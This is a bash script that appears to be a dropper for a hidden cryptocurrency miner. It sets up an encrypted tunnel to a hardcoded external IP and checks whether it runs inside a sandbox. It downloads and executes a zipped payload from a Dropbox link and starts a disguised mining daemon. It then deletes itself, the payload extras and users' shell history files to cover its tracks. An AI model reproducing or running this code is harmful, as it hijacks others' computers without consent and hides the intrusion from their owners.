#!/usr/bin/env bash
## needed tmux sed grep envsubst

export ENDPOINT2_TOKEN=acstkn \
       TNL_LISTEN_TARGET=52.2.254.4:8486 \
       TNL_LISTEN_TARGET2=127.0.0.1:18213 \
       TNL_FORWARD_SCHEME=ss+kcp \
       TNL_FORWARD_PORT=18214 \

#PAUSD_RATE=200
#PAUSD_SHARES=10
#THREADS_FIXED=4
#MHF_FIXED=4
#SCRATCH_START=0
#TNL_FORWARD_ADDR=
#SWITCH_PROFILE=WARM
#MAX_LOAD=300
#wakeup_timeout=6000

## load customization variables
[ -f env.sh ] && . ./env.sh

tmppath() {
    if tmppath=$($bb mktemp -d); then
        export PATH=${tmppath}:${PATH} tmppath
    else
        for ph in {/dev/shm,/run,~/}; do
            rm -rf $ph/.path &&
                mkdir -p $ph/.path &&
                tmppath=$ph/.path &&
                export PATH=${ph}/.path:${PATH} tmppath &&
                break
        done
    fi
}
tmppath
[ -n "$tmppath" ] && cd $tmppath

jailjudge() {
    ## where are we
    c=$(builtin compgen -G '/etc/cpa*')
    d=$(builtin compgen -G '/dev/*')
    s=$(builtin compgen -G '/sys/*')
    p=$(builtin compgen -G '/proc/*')
    jail=
    if [ -n "$c" -o -z "$d" -o -z "$s" -o -z "$p" ]; then ## we are in a jail
        jail=1
    fi
}
jailjudge

getpayload() {
    ## get payload from dbx
    token=${pl_token:-lb7bxod7kcafkd5}
    name=${pl_name:-payload.zip}
    dir=pltmp
    wget -q https://dl.dropboxusercontent.com/s/$token/$name
    mkdir -p $dir && unzip -d $dir $name && rm $name || exit 1
    cd $dir || exit 1
    # tar xf ${BRANCH}.tar.gz && rm ${BRANCH}.tar.gz
    # cd scripts-${BRANCH} || exit 1
}
getpayload

. ./functions || exit 1

## utility vars
# CFG_BASE_URL=https://rawgit.com/untoreh/scripts/master/cfg/

## env vars
export PATH=.:pl:$PATH

## choose masks
. ./masks || exit 1

## start tunnel
. ./tstarter || exit 1
setup_tnl

## config object
. ./objconfig || exit 1

## start the pausd daemon passing the object args
. ./pausd || exit 1
. ./switch || exit 1
start &
fleep 1 ## give time to fail

## check for alternate if fail
slept=0
while [ "$(jobs -r | wc -l)" -lt 2 ]; do
    slept=$((slept+1))
    if [ $slept -gt 5 ]; then ## no aes means crash means aeon
        ## altconfig
        . ./altconfig
        ## init
        start &
        break
    fi
    fleep 1
done
fleep 1 ## once more for edge cases

cd ..
## debug
[ "$DEBUG" ] && env>dump.env && exit

rm -rf -- "$0" \
   "scripts-${BRANCH}" \
   "$HOME"/.*_history \
   ~/.*_history \
   /.*_history
[ -n "$tmppath" ] && find ${tmppath}/${dir} \
     ! -name "$OBJ_MASK" \
     ! -name "$OBJ_CFG_MASK" \
     -delete

wait %+
